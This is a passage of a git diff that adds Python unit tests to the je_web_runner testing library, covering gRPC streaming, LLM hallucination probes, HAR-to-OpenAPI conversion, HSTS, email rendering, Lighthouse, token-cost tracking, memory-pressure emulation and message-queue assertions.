frames=[StreamFrame() for _ in range(3)]) + assert_frame_count_between(rec, min_count=1, max_count=5) + + def test_fail_high(self): + rec = StreamRecord("m", Mode.SERVER_STREAM, + frames=[StreamFrame() for _ in range(10)]) + with self.assertRaises(GrpcStreamingAssertError): + assert_frame_count_between(rec, min_count=0, max_count=5) + + def test_fail_low(self): + rec = StreamRecord("m", Mode.SERVER_STREAM, frames=[]) + with self.assertRaises(GrpcStreamingAssertError): + assert_frame_count_between(rec, min_count=1, max_count=5) + + def test_bad_bounds(self): + with self.assertRaises(GrpcStreamingAssertError): + assert_frame_count_between( + StreamRecord("m", Mode.UNARY), min_count=5, max_count=1, + ) + + +class TestFrameSize(unittest.TestCase): + + def test_pass(self): + rec = StreamRecord("m", Mode.UNARY, + frames=[StreamFrame(payload_size=100)]) + assert_max_frame_size(rec, max_bytes=200) + + def test_fail(self): + rec = StreamRecord("m", Mode.UNARY, + frames=[StreamFrame(payload_size=999)]) + with self.assertRaises(GrpcStreamingAssertError): + assert_max_frame_size(rec, max_bytes=200) + + def test_bad_max(self): + with self.assertRaises(GrpcStreamingAssertError): + assert_max_frame_size(StreamRecord("m", Mode.UNARY), max_bytes=0) + + +class TestOrder(unittest.TestCase): + + def test_pass(self): + rec = StreamRecord("m", Mode.SERVER_STREAM, frames=[ + StreamFrame(body={"seq": 0}), + StreamFrame(body={"seq": 1}), + ]) + assert_frames_in_order(rec, key="seq", expected=[0, 1]) + + def test_fail(self): + rec = StreamRecord("m", Mode.SERVER_STREAM, frames=[ + StreamFrame(body={"seq": 1}), + StreamFrame(body={"seq": 0}), + ]) + with self.assertRaises(GrpcStreamingAssertError): + assert_frames_in_order(rec, key="seq", expected=[0, 1]) + + +class TestDeadline(unittest.TestCase): + + def test_pass(self): + assert_no_deadline_exceeded(StreamRecord( + "m", Mode.UNARY, status=StatusCode.OK, + )) + + def test_fail(self): + with self.assertRaises(GrpcStreamingAssertError): + assert_no_deadline_exceeded(StreamRecord( + "m", Mode.UNARY, status=StatusCode.DEADLINE_EXCEEDED, + )) + + +class TestHalfClose(unittest.TestCase): + + def test_pass(self): + rec = StreamRecord("m", Mode.BIDI, frames=[ + StreamFrame(direction="in", ts_ms=100), + ], half_closed_ts_ms=50) + assert_half_close_before_final(rec) + + def test_fail_after_last(self): + rec = StreamRecord("m", Mode.BIDI, frames=[ + StreamFrame(direction="in", ts_ms=100), + ], half_closed_ts_ms=200) + with self.assertRaises(GrpcStreamingAssertError): + assert_half_close_before_final(rec) + + def test_never_half_closed(self): + with self.assertRaises(GrpcStreamingAssertError): + assert_half_close_before_final(StreamRecord("m", Mode.BIDI)) + + def test_wrong_mode(self): + with self.assertRaises(GrpcStreamingAssertError): + assert_half_close_before_final(StreamRecord("m", Mode.UNARY, + half_closed_ts_ms=1)) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_hallucination_probe.py b/test/unit_test/test_hallucination_probe.py new file mode 100644 index 0000000..bff7644 --- /dev/null +++ b/test/unit_test/test_hallucination_probe.py @@ -0,0 +1,130 @@ +"""Unit tests for je_web_runner.utils.hallucination_probe.""" +import unittest + +from je_web_runner.utils.hallucination_probe.probe import ( + HallucinationProbeError, + Probe, + ProbeReport, + ProbeResult, + assert_hallucination_rate_under, + run_probes, +) + + +class TestProbeInit(unittest.TestCase): + + def test_basic(self): + Probe(name="x", prompt="y", expected_substrings=["z"]) + + def test_no_constraints(self): + with self.assertRaises(HallucinationProbeError): + Probe(name="x", prompt="y") + + def test_empty_name(self): + with self.assertRaises(HallucinationProbeError): + Probe(name="", prompt="y", expected_substrings=["z"]) + + +class TestEvaluate(unittest.TestCase): + + def test_expected_hit(self): + report = run_probes( + [Probe(name="capital", prompt="?", + expected_substrings=["Paris"])], + caller=lambda q: "The capital is Paris.", + ) + self.assertTrue(report.results[0].passed) + + def test_expected_miss(self): + report = run_probes( + [Probe(name="capital", prompt="?", + expected_substrings=["Paris"])], + caller=lambda q: "Berlin", + ) + self.assertFalse(report.results[0].passed) + + def test_forbidden_hit(self): + report = run_probes( + [Probe(name="redact", prompt="?", + forbidden_substrings=["SSN"])], + caller=lambda q: "Your SSN is 123", + ) + self.assertFalse(report.results[0].passed) + + def test_expect_refusal_pass(self): + report = run_probes( + [Probe(name="unknown", prompt="?", expect_refusal=True)], + caller=lambda q: "I don't know.", + ) + self.assertTrue(report.results[0].passed) + + def test_expect_refusal_fail(self): + report = run_probes( + [Probe(name="unknown", prompt="?", expect_refusal=True)], + caller=lambda q: "The answer is 42", + ) + self.assertFalse(report.results[0].passed) + + +class TestRun(unittest.TestCase): + + def test_caller_raises(self): + def boom(q): + raise RuntimeError("net") + report = run_probes( + [Probe(name="p", prompt="?", expected_substrings=["x"])], + caller=boom, + ) + self.assertFalse(report.results[0].passed) + + def test_caller_returns_non_str(self): + report = run_probes( + [Probe(name="p", prompt="?", expected_substrings=["x"])], + caller=lambda q: 123, + ) + self.assertFalse(report.results[0].passed) + + def test_empty_probes(self): + with self.assertRaises(HallucinationProbeError): + run_probes([], caller=lambda q: "") + + def test_non_callable(self): + with self.assertRaises(HallucinationProbeError): + run_probes( + [Probe(name="p", prompt="?", expected_substrings=["x"])], + caller="nope", + ) + + +class TestRate(unittest.TestCase): + + def test_zero(self): + self.assertEqual(ProbeReport().hallucination_rate, 0) + + def test_compute(self): + report = ProbeReport(results=[ + ProbeResult(name="a", answer="", passed=True), + ProbeResult(name="b", answer="", passed=False), + ]) + self.assertEqual(report.hallucination_rate, 0.5) + + +class TestAssert(unittest.TestCase): + + def test_pass(self): + assert_hallucination_rate_under(ProbeReport(), max_rate=0.1) + + def test_fail(self): + report = ProbeReport(results=[ + ProbeResult(name="x", answer="", passed=False), + ]) + with self.assertRaises(HallucinationProbeError): + assert_hallucination_rate_under(report, max_rate=0) + + def test_bad_rate(self): + with self.assertRaises(HallucinationProbeError): + assert_hallucination_rate_under(ProbeReport(), max_rate=2) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_har_to_openapi.py b/test/unit_test/test_har_to_openapi.py new file mode 100644 index 0000000..11f8741 --- /dev/null +++ b/test/unit_test/test_har_to_openapi.py @@ -0,0 +1,82 @@ +"""Unit tests for je_web_runner.utils.har_to_openapi.""" +import json +import unittest + +from je_web_runner.utils.har_to_openapi.converter import ( + HarToOpenapiError, + assert_spec_minimum_coverage, + convert, +) + + +def _entry(url, method="GET", status=200, body=None): + return { + "request": {"url": url, "method": method}, + "response": { + "status": status, + "content": {"text": json.dumps(body) if body is not None else ""}, + }, + } + + +def _har(*entries): + return {"log": {"entries": list(entries)}} + + +class TestConvert(unittest.TestCase): + + def test_basic(self): + spec = convert(_har(_entry("https://api/users/42", + body={"id": 42, "name": "x"}))) + self.assertIn("/users/{id}", spec["paths"]) + op = spec["paths"]["/users/{id}"]["get"] + schema = op["responses"]["200"]["content"]["application/json"]["schema"] + self.assertEqual(schema["type"], "object") + self.assertIn("name", schema["properties"]) + + def test_uuid_collapses(self): + spec = convert(_har(_entry( + "https://api/orders/9e107d9d-372b-4f72-9f49-2c7c4be32e2c", + ))) + self.assertIn("/orders/{uuid}", spec["paths"]) + + def test_query_params(self): + spec = convert(_har(_entry("https://api/search?q=foo&lang=ja"))) + params = spec["paths"]["/search"]["get"]["parameters"] + names = {p["name"] for p in params} + self.assertEqual(names, {"q", "lang"}) + + def test_multiple_methods(self): + spec = convert(_har( + _entry("https://api/x", method="GET"), + _entry("https://api/x", method="POST"), + )) + self.assertEqual(set(spec["paths"]["/x"].keys()), {"get", "post"}) + + def test_bad_har(self): + with self.assertRaises(HarToOpenapiError): + convert("nope") + + def test_bad_entries(self): + with self.assertRaises(HarToOpenapiError): + convert({"log": {"entries": "nope"}}) + + +class TestCoverage(unittest.TestCase): + + def test_pass(self): + spec = convert(_har(_entry("https://api/x"), _entry("https://api/y"))) + assert_spec_minimum_coverage(spec, min_paths=2) + + def test_fail(self): + spec = convert(_har(_entry("https://api/x"))) + with self.assertRaises(HarToOpenapiError): + assert_spec_minimum_coverage(spec, min_paths=2) + + def test_bad_min(self): + with self.assertRaises(HarToOpenapiError): + assert_spec_minimum_coverage({}, min_paths=0) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_hsts_preload_audit.py b/test/unit_test/test_hsts_preload_audit.py new file mode 100644 index 0000000..02fc58e --- /dev/null +++ b/test/unit_test/test_hsts_preload_audit.py @@ -0,0 +1,74 @@ +"""Unit tests for je_web_runner.utils.hsts_preload_audit.""" +import unittest + +from je_web_runner.utils.hsts_preload_audit.audit import ( + HstsPreloadAuditError, + assert_preload_ready, + assert_served_over_https, + parse_header, +) + + +GOOD = "max-age=63072000; includeSubDomains; preload" + + +class TestParse(unittest.TestCase): + + def test_basic(self): + h = parse_header(GOOD) + self.assertEqual(h.max_age, 63072000) + self.assertTrue(h.include_subdomains) + self.assertTrue(h.preload) + + def test_empty(self): + with self.assertRaises(HstsPreloadAuditError): + parse_header("") + + def test_bad_max_age(self): + with self.assertRaises(HstsPreloadAuditError): + parse_header("max-age=garbage") + + def test_partial(self): + h = parse_header("max-age=100") + self.assertEqual(h.max_age, 100) + self.assertFalse(h.preload) + + +class TestPreloadReady(unittest.TestCase): + + def test_pass(self): + assert_preload_ready(parse_header(GOOD)) + + def test_short_max_age(self): + with self.assertRaises(HstsPreloadAuditError): + assert_preload_ready( + parse_header("max-age=86400; includeSubDomains; preload"), + ) + + def test_missing_subdomain(self): + with self.assertRaises(HstsPreloadAuditError): + assert_preload_ready(parse_header("max-age=63072000; preload")) + + def test_missing_preload(self): + with self.assertRaises(HstsPreloadAuditError): + assert_preload_ready(parse_header( + "max-age=63072000; includeSubDomains", + )) + + +class TestHttps(unittest.TestCase): + + def test_pass(self): + assert_served_over_https("https") + + def test_fail(self): + with self.assertRaises(HstsPreloadAuditError): + assert_served_over_https("http") + + def test_bad_type(self): + with self.assertRaises(HstsPreloadAuditError): + assert_served_over_https(123) # NOSONAR python:S5655 - deliberate bad input + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_hydration_streaming.py b/test/unit_test/test_hydration_streaming.py new file mode 100644 index 0000000..b88cac6 --- /dev/null +++ b/test/unit_test/test_hydration_streaming.py @@ -0,0 +1,161 @@ +"""Unit tests for je_web_runner.utils.hydration_streaming.""" +import unittest + +from je_web_runner.utils.hydration_streaming.timing import ( + BoundaryTiming, + HARVEST_SCRIPT, + HydrationStreamingError, + INSTALL_SCRIPT, + StreamingReport, + assert_all_arrived, + assert_arrival_under, + assert_interactive_under, + assert_order, + parse_log, +) + + +def _payload(boundaries): + return {"boundaries": boundaries, "start": 0} + + +class TestScripts(unittest.TestCase): + + def test_install_guard(self): + self.assertIn("__wr_hs_installed__", INSTALL_SCRIPT) + self.assertIn("MutationObserver", INSTALL_SCRIPT) + + def test_harvest_constant(self): + self.assertIn("__wr_hs__", HARVEST_SCRIPT) + + +class TestParse(unittest.TestCase): + + def test_basic(self): + rep = parse_log(_payload({ + "B:1": {"placeholder": 10, "arrived": 50, "interactive": 70}, + })) + b = rep.boundaries[0] + self.assertEqual(b.id, "B:1") + self.assertEqual(b.time_to_arrival(), 40) + self.assertEqual(b.time_to_interactive(), 20) + + def test_skips_non_dict(self): + rep = parse_log(_payload({"x": "not a dict"})) + self.assertEqual(rep.boundaries, []) + + def test_rejects_non_dict_payload(self): + with self.assertRaises(HydrationStreamingError): + parse_log("nope") + + def test_rejects_bad_boundaries(self): + with self.assertRaises(HydrationStreamingError): + parse_log({"boundaries": "x"}) + + def test_handles_bad_timing(self): + rep = parse_log(_payload({"x": {"placeholder": "abc"}})) + self.assertIsNone(rep.boundaries[0].placeholder_ms) + + +class TestAssertAllArrived(unittest.TestCase): + + def test_pass(self): + assert_all_arrived(parse_log(_payload({"x": {"arrived": 5}}))) + + def test_fail(self): + with self.assertRaises(HydrationStreamingError): + assert_all_arrived(parse_log(_payload({"x": {"placeholder": 5}}))) + + +class TestAssertArrivalUnder(unittest.TestCase): + + def test_pass(self): + rep = parse_log(_payload({"x": {"placeholder": 0, "arrived": 100}})) + self.assertEqual(assert_arrival_under(rep, id_="x", max_ms=200), 100) + + def test_too_slow(self): + rep = parse_log(_payload({"x": {"placeholder": 0, "arrived": 500}})) + with self.assertRaises(HydrationStreamingError): + assert_arrival_under(rep, id_="x", max_ms=200) + + def test_missing_timing(self): + rep = parse_log(_payload({"x": {"placeholder": 0}})) + with self.assertRaises(HydrationStreamingError): + assert_arrival_under(rep, id_="x", max_ms=200) + + def test_unknown(self): + with self.assertRaises(HydrationStreamingError): + assert_arrival_under(StreamingReport(), id_="x", max_ms=200) + + def test_bad_threshold(self): + with self.assertRaises(HydrationStreamingError): + assert_arrival_under(StreamingReport(), id_="x", max_ms=0) + + +class TestAssertInteractiveUnder(unittest.TestCase): + + def test_pass(self): + rep = parse_log(_payload({"x": {"arrived": 100, "interactive": 200}})) + self.assertEqual(assert_interactive_under(rep, id_="x", max_ms=200), 100) + + def test_too_slow(self): + rep = parse_log(_payload({"x": {"arrived": 100, "interactive": 1000}})) + with self.assertRaises(HydrationStreamingError): + assert_interactive_under(rep, id_="x", max_ms=200) + + def test_missing_timing(self): + with self.assertRaises(HydrationStreamingError): + assert_interactive_under( + parse_log(_payload({"x": {"arrived": 100}})), + id_="x", max_ms=200, + ) + + def test_unknown_boundary(self): + with self.assertRaises(HydrationStreamingError): + assert_interactive_under(StreamingReport(), id_="x", max_ms=200) + + def test_bad_threshold(self): + with self.assertRaises(HydrationStreamingError): + assert_interactive_under(StreamingReport(), id_="x", max_ms=-1) + + +class TestAssertOrder(unittest.TestCase): + + def test_pass(self): + rep = parse_log(_payload({ + "a": {"arrived": 10}, + "b": {"arrived": 20}, + "c": {"arrived": 30}, + })) + assert_order(rep, expected_order=["a", "b", "c"]) + + def test_wrong_order(self): + rep = parse_log(_payload({ + "a": {"arrived": 30}, + "b": {"arrived": 10}, + })) + with self.assertRaises(HydrationStreamingError): + assert_order(rep, expected_order=["a", "b"]) + + def test_empty_expected(self): + with self.assertRaises(HydrationStreamingError): + assert_order(StreamingReport(), expected_order=[]) + + def test_ignores_extras(self): + rep = parse_log(_payload({ + "a": {"arrived": 10}, + "b": {"arrived": 20}, + "c": {"arrived": 30}, + })) + assert_order(rep, expected_order=["a", "b"]) + + +class TestByIdLookup(unittest.TestCase): + + def test_by_id(self): + rep = StreamingReport(boundaries=[BoundaryTiming(id="x")]) + self.assertIn("x", rep.by_id()) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_inbox_render_outlook.py b/test/unit_test/test_inbox_render_outlook.py new file mode 100644 index 0000000..a97ce44 --- /dev/null +++ b/test/unit_test/test_inbox_render_outlook.py @@ -0,0 +1,99 @@ +"""Unit tests for je_web_runner.utils.inbox_render_outlook.""" +import unittest + +from je_web_runner.utils.inbox_render_outlook.render import ( + InboxRenderOutlookError, + RenderFinding, + Severity, + assert_no_errors, + audit_all, + audit_apple_mail, + audit_gmail, + audit_outlook, +) + + +CLEAN_TABLE = ( + "
Hi
" + "" + "" +) + + +class TestOutlook(unittest.TestCase): + + def test_flex_warn(self): + findings = audit_outlook("") + rules = {f.rule for f in findings} + self.assertIn("outlook-incompatible-css", rules) + + def test_svg_error(self): + findings = audit_outlook("") + self.assertIn("outlook-no-svg", {f.rule for f in findings}) + + def test_no_table_warn(self): + findings = audit_outlook("
x
") + self.assertIn("outlook-needs-table-layout", {f.rule for f in findings}) + + def test_clean(self): + findings = audit_outlook("
x
") + rules = {f.rule for f in findings} + self.assertNotIn("outlook-incompatible-css", rules) + + def test_bad_input(self): + with self.assertRaises(InboxRenderOutlookError): + audit_outlook(123) # NOSONAR python:S5655 - deliberate bad input + + +class TestGmail(unittest.TestCase): + + def test_media_query_warning(self): + findings = audit_gmail("") + rules = {f.rule for f in findings} + self.assertIn("gmail-media-queries-need-inline", rules) + + def test_clipping(self): + large = "" + "x" * (110 * 1024) + "" + findings = audit_gmail(large) + rules = {f.rule for f in findings} + self.assertIn("gmail-message-clipping", rules) + + def test_clean(self): + self.assertEqual(audit_gmail("

x

"), []) + + +class TestAppleMail(unittest.TestCase): + + def test_no_dark_mode(self): + findings = audit_apple_mail("x") + rules = {f.rule for f in findings} + self.assertIn("apple-mail-dark-mode", rules) + + def test_has_dark_mode(self): + findings = audit_apple_mail(CLEAN_TABLE) + rules = {f.rule for f in findings} + self.assertNotIn("apple-mail-dark-mode", rules) + + +class TestAll(unittest.TestCase): + + def test_combines(self): + findings = audit_all("
x
") + # both outlook + gmail + apple emit at least one finding each + self.assertGreaterEqual(len(findings), 3) + + +class TestAssertNoErrors(unittest.TestCase): + + def test_pass(self): + assert_no_errors([RenderFinding(rule="x", severity=Severity.WARN, + message="")]) + + def test_fail(self): + with self.assertRaises(InboxRenderOutlookError): + assert_no_errors([RenderFinding(rule="x", severity=Severity.ERROR, + message="")]) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_lcp_image_audit.py b/test/unit_test/test_lcp_image_audit.py new file mode 100644 index 0000000..3b9d82c --- /dev/null +++ b/test/unit_test/test_lcp_image_audit.py @@ -0,0 +1,104 @@ +"""Unit tests for je_web_runner.utils.lcp_image_audit.""" +import unittest + +from je_web_runner.utils.lcp_image_audit.audit import ( + LcpCandidate, + LcpImageAuditError, + assert_fetchpriority_high, + assert_lcp_not_lazy_loaded, + assert_lcp_preloaded, + parse_candidate, +) + + +class TestParse(unittest.TestCase): + + def test_basic(self): + c = parse_candidate({"url": "/hero.jpg", "size_px": 1000}) + self.assertEqual(c.url, "/hero.jpg") + + def test_src_alias(self): + c = parse_candidate({"src": "/x.jpg"}) + self.assertEqual(c.url, "/x.jpg") + + def test_missing_url(self): + with self.assertRaises(LcpImageAuditError): + parse_candidate({}) + + def test_bad_payload(self): + with self.assertRaises(LcpImageAuditError): + parse_candidate("nope") + + +class TestPreloaded(unittest.TestCase): + + def test_pass(self): + html = '' + assert_lcp_preloaded(LcpCandidate(url="/hero.jpg"), html) + + def test_reverse_order(self): + html = '' + assert_lcp_preloaded(LcpCandidate(url="/hero.jpg"), html) + + def test_link_header(self): + assert_lcp_preloaded( + LcpCandidate(url="/hero.jpg"), "", + link_header_urls=["/hero.jpg"], + ) + + def test_fail(self): + with self.assertRaises(LcpImageAuditError): + assert_lcp_preloaded(LcpCandidate(url="/missing.jpg"), + '') + + def test_bad_html(self): + with self.assertRaises(LcpImageAuditError): + assert_lcp_preloaded(LcpCandidate(url="/x"), html=123) # NOSONAR python:S5655 - deliberate bad input + + +class TestLazy(unittest.TestCase): + + def test_pass(self): + assert_lcp_not_lazy_loaded(LcpCandidate(url="/hero.jpg"), + '') + + def test_fail(self): + with self.assertRaises(LcpImageAuditError): + assert_lcp_not_lazy_loaded( + LcpCandidate(url="/hero.jpg"), + '', + ) + + def test_bad_html(self): + with self.assertRaises(LcpImageAuditError): + assert_lcp_not_lazy_loaded(LcpCandidate(url="/x"), html=123) # NOSONAR python:S5655 - deliberate bad input + + +class TestFetchPriority(unittest.TestCase): + + def test_pass(self): + assert_fetchpriority_high( + LcpCandidate(url="/hero.jpg"), + '', + ) + + def test_pass_reverse(self): + assert_fetchpriority_high( + LcpCandidate(url="/hero.jpg"), + '', + ) + + def test_fail(self): + with self.assertRaises(LcpImageAuditError): + assert_fetchpriority_high( + LcpCandidate(url="/hero.jpg"), + '', + ) + + def test_bad_html(self): + with self.assertRaises(LcpImageAuditError): + assert_fetchpriority_high(LcpCandidate(url="/x"), html=123) # NOSONAR python:S5655 - deliberate bad input + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_lighthouse_regression.py b/test/unit_test/test_lighthouse_regression.py new file mode 100644 index 0000000..af84bbb --- /dev/null +++ b/test/unit_test/test_lighthouse_regression.py @@ -0,0 +1,116 @@ +"""Unit tests for je_web_runner.utils.lighthouse_regression.""" +import unittest + +from je_web_runner.utils.lighthouse_regression.regression import ( + LighthouseRegressionError, + LighthouseSnapshot, + ScoreDelta, + RegressionReport, + assert_metric_within, + assert_no_score_regression, + diff, + parse_report, +) + + +REPORT = { + "categories": { + "performance": {"score": 0.92}, + "accessibility": {"score": 1.0}, + "best-practices": {"score": 0.85}, + "seo": {"score": 0.9}, + }, + "audits": { + "largest-contentful-paint": {"numericValue": 2400}, + "cumulative-layout-shift": {"numericValue": 0.05}, + "total-blocking-time": {"numericValue": 150}, + }, +} + + +class TestParse(unittest.TestCase): + + def test_basic(self): + snap = parse_report(REPORT) + self.assertEqual(snap.scores["performance"], 92) + self.assertEqual(snap.metrics["largest-contentful-paint"], 2400) + + def test_bad(self): + with self.assertRaises(LighthouseRegressionError): + parse_report("nope") + + def test_bad_categories(self): + with self.assertRaises(LighthouseRegressionError): + parse_report({"categories": "nope"}) + + def test_skip_null_score(self): + snap = parse_report({"categories": {"performance": {"score": None}}}) + self.assertNotIn("performance", snap.scores) + + def test_bad_score_value(self): + with self.assertRaises(LighthouseRegressionError): + parse_report({"categories": {"performance": {"score": "x"}}}) + + +class TestDiff(unittest.TestCase): + + def test_change(self): + baseline = LighthouseSnapshot(scores={"performance": 95}) + head = LighthouseSnapshot(scores={"performance": 80}) + report = diff(baseline, head) + self.assertEqual(report.score_changes[0].delta, -15) + + def test_metric_change(self): + baseline = LighthouseSnapshot(metrics={"largest-contentful-paint": 2000}) + head = LighthouseSnapshot(metrics={"largest-contentful-paint": 3500}) + report = diff(baseline, head) + self.assertEqual(report.metric_changes[0].delta, 1500) + + +class TestRegression(unittest.TestCase): + + def test_pass(self): + assert_no_score_regression(RegressionReport(score_changes=[ + ScoreDelta(category="performance", baseline=90, head=88), + ])) + + def test_fail(self): + with self.assertRaises(LighthouseRegressionError): + assert_no_score_regression(RegressionReport(score_changes=[ + ScoreDelta(category="performance", baseline=90, head=80), + ])) + + def test_bad_threshold(self): + with self.assertRaises(LighthouseRegressionError): + assert_no_score_regression(RegressionReport(), threshold_points=0) + + +class TestMetricWithin(unittest.TestCase): + + def test_pass(self): + assert_metric_within( + parse_report(REPORT), + metric="largest-contentful-paint", max_value=3000, + ) + + def test_fail(self): + with self.assertRaises(LighthouseRegressionError): + assert_metric_within( + parse_report(REPORT), + metric="largest-contentful-paint", max_value=1000, + ) + + def test_bad_metric(self): + with self.assertRaises(LighthouseRegressionError): + assert_metric_within(LighthouseSnapshot(), + metric="weird", max_value=1) + + def test_missing(self): + with self.assertRaises(LighthouseRegressionError): + assert_metric_within(LighthouseSnapshot(), + metric="largest-contentful-paint", + max_value=1) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_llm_token_cost_tracker.py b/test/unit_test/test_llm_token_cost_tracker.py new file mode 100644 index 0000000..3060fb6 --- /dev/null +++ b/test/unit_test/test_llm_token_cost_tracker.py @@ -0,0 +1,123 @@ +"""Unit tests for je_web_runner.utils.llm_token_cost_tracker.""" +import unittest + +from je_web_runner.utils.llm_token_cost_tracker.tracker import ( + CallRecord, + LlmTokenCostError, + Tally, + assert_under_budget, + compute_cost, + tally, + tally_by_test, + top_spenders, +) + + +class TestRecord(unittest.TestCase): + + def test_basic(self): + r = CallRecord(model="claude-opus-4-7", input_tokens=100, + output_tokens=100) + self.assertEqual(r.model, "claude-opus-4-7") + + def test_empty_model(self): + with self.assertRaises(LlmTokenCostError): + CallRecord(model="") + + def test_negative(self): + with self.assertRaises(LlmTokenCostError): + CallRecord(model="x", input_tokens=-1) + + +class TestCompute(unittest.TestCase): + + def test_known_model(self): + cost = compute_cost(CallRecord(model="claude-haiku-4-5", + input_tokens=1000, + output_tokens=1000)) + # 0.001 + 0.005 + self.assertAlmostEqual(cost, 0.006, places=6) + + def test_prefix_match(self): + cost = compute_cost(CallRecord( + model="claude-opus-4-7-2026-05-01", + input_tokens=1000, output_tokens=1000, + )) + # uses claude-opus-4-7 prices: 0.015 + 0.075 + self.assertAlmostEqual(cost, 0.090, places=6) + + def test_unknown_model(self): + with self.assertRaises(LlmTokenCostError): + compute_cost(CallRecord(model="weird-model")) + + def test_override(self): + cost = compute_cost( + CallRecord(model="my-model", input_tokens=1000), + rate_card_override={"my-model": {"input": 0.1, "output": 0}}, + ) + self.assertAlmostEqual(cost, 0.1, places=6) + + +class TestTally(unittest.TestCase): + + def test_aggregate(self): + summary = tally([ + CallRecord(model="claude-haiku-4-5", input_tokens=1000), + CallRecord(model="claude-haiku-4-5", output_tokens=1000), + ]) + self.assertEqual(summary.calls, 2) + self.assertAlmostEqual(summary.cost_usd, 0.006, places=6) + + def test_bad_record(self): + with self.assertRaises(LlmTokenCostError): + tally(["nope"]) + + +class TestByTest(unittest.TestCase): + + def test_buckets(self): + out = tally_by_test([ + CallRecord(model="claude-haiku-4-5", input_tokens=1000, + test_name="t1"), + CallRecord(model="claude-haiku-4-5", input_tokens=1000, + test_name="t2"), + ]) + self.assertIn("t1", out) + self.assertIn("t2", out) + + def test_unknown_bucket(self): + out = tally_by_test([CallRecord(model="claude-haiku-4-5", + input_tokens=10)]) + self.assertIn("(unknown)", out) + + +class TestBudget(unittest.TestCase): + + def test_pass(self): + assert_under_budget(Tally(cost_usd=0.5), max_usd=1.0) + + def test_fail(self): + with self.assertRaises(LlmTokenCostError): + assert_under_budget(Tally(cost_usd=2), max_usd=1) + + def test_bad_max(self): + with self.assertRaises(LlmTokenCostError): + assert_under_budget(Tally(), max_usd=0) + + +class TestTopSpenders(unittest.TestCase): + + def test_sorted(self): + out = top_spenders( + {"a": Tally(cost_usd=0.1), "b": Tally(cost_usd=1.0)}, + top_n=2, + ) + self.assertEqual(out[0]["test"], "b") + + def test_bad_n(self): + with self.assertRaises(LlmTokenCostError): + top_spenders({}, top_n=0) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_memory_pressure_emulate.py b/test/unit_test/test_memory_pressure_emulate.py new file mode 100644 index 0000000..42ea933 --- /dev/null +++ b/test/unit_test/test_memory_pressure_emulate.py @@ -0,0 +1,104 @@ +"""Unit tests for je_web_runner.utils.memory_pressure_emulate.""" +import unittest + +from je_web_runner.utils.memory_pressure_emulate.emulate import ( + DEFAULT_PROFILES, + EmulationProfile, + MemoryPressureError, + PressureRunOutcome, + assert_passed_under_pressure, + cdp_payloads, + run_under_profile, +) + + +class TestProfile(unittest.TestCase): + + def test_validation(self): + with self.assertRaises(MemoryPressureError): + EmulationProfile(name="x", hardware_concurrency=0) + with self.assertRaises(MemoryPressureError): + EmulationProfile(name="x", cpu_throttle_rate=0.5) + with self.assertRaises(MemoryPressureError): + EmulationProfile(name="x", js_heap_limit_bytes=0) + + def test_defaults(self): + names = {p.name for p in DEFAULT_PROFILES} + self.assertIn("low_end_phone", names) + self.assertIn("critical_pressure", names) + + +class TestCdpPayloads(unittest.TestCase): + + def test_basic(self): + cmds = cdp_payloads(EmulationProfile(name="x")) + methods = [c["method"] for c in cmds] + self.assertIn("Emulation.setHardwareConcurrencyOverride", methods) + self.assertIn("Emulation.setCPUThrottlingRate", methods) + self.assertIn("Memory.simulatePressureNotification", methods) + + def test_includes_heap_when_set(self): + cmds = cdp_payloads(EmulationProfile(name="x", js_heap_limit_bytes=1024)) + self.assertTrue(any( + c["method"] == "HeapProfiler.setSamplingHeapProfiler" for c in cmds + )) + + def test_rejects_non_profile(self): + with self.assertRaises(MemoryPressureError): + cdp_payloads("nope") + + +class TestRunUnderProfile(unittest.TestCase): + + def test_pass(self): + sent = [] + + def fake_cdp(method, params): + sent.append(method) + + outcome = run_under_profile( + EmulationProfile(name="x"), fake_cdp, lambda: None, + ) + self.assertTrue(outcome.passed) + self.assertIn("Emulation.setCPUThrottlingRate", sent) + + def test_test_failure_recorded(self): + def bad(): + raise AssertionError("oops") + outcome = run_under_profile( + EmulationProfile(name="x"), lambda m, p: None, bad, + ) + self.assertFalse(outcome.passed) + self.assertIn("oops", outcome.error or "") + + def test_cdp_failure_wrapped(self): + def bad_cdp(method, params): + raise RuntimeError("no cdp") + with self.assertRaises(MemoryPressureError): + run_under_profile(EmulationProfile(name="x"), bad_cdp, lambda: None) + + def test_rejects_non_callable(self): + with self.assertRaises(MemoryPressureError): + run_under_profile(EmulationProfile(name="x"), "not", lambda: None) + with self.assertRaises(MemoryPressureError): + run_under_profile(EmulationProfile(name="x"), lambda m, p: None, "not") + + +class TestAssertPassed(unittest.TestCase): + + def test_pass(self): + assert_passed_under_pressure(PressureRunOutcome(profile="x", passed=True)) + + def test_fail(self): + with self.assertRaises(MemoryPressureError): + assert_passed_under_pressure(PressureRunOutcome( + profile="x", passed=False, error="boom", + )) + + def test_rejects_non_outcome(self): + with self.assertRaises(MemoryPressureError): + assert_passed_under_pressure("nope") + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_mq_assert.py b/test/unit_test/test_mq_assert.py new file mode 100644 index 0000000..8f341f8 --- /dev/null +++ b/test/unit_test/test_mq_assert.py @@ -0,0 +1,136 @@ +"""Unit tests for je_web_runner.utils.mq_assert.""" +import unittest + +from je_web_runner.utils.mq_assert.assertions import ( + Message, + MqAssertError, + assert_idempotent, + assert_message_published, + assert_no_message, + assert_ordered, + drain_topic, +) + + +class FakeConsumer: + def __init__(self, payload): + self.payload = payload + + def drain(self, topic, *, timeout=5.0): + return self.payload + + +class TestDrain(unittest.TestCase): + + def test_messages_pass_through(self): + c = FakeConsumer([Message(topic="t", body={"x": 1})]) + out = drain_topic(c, "t") + self.assertEqual(out[0].body["x"], 1) + + def test_dict_messages(self): + c = FakeConsumer([{"body": {"x": 2}, "key": "k"}]) + out = drain_topic(c, "t") + self.assertEqual(out[0].key, "k") + self.assertEqual(out[0].topic, "t") + + def test_empty_topic(self): + with self.assertRaises(MqAssertError): + drain_topic(FakeConsumer([]), "") + + def test_bad_consumer(self): + with 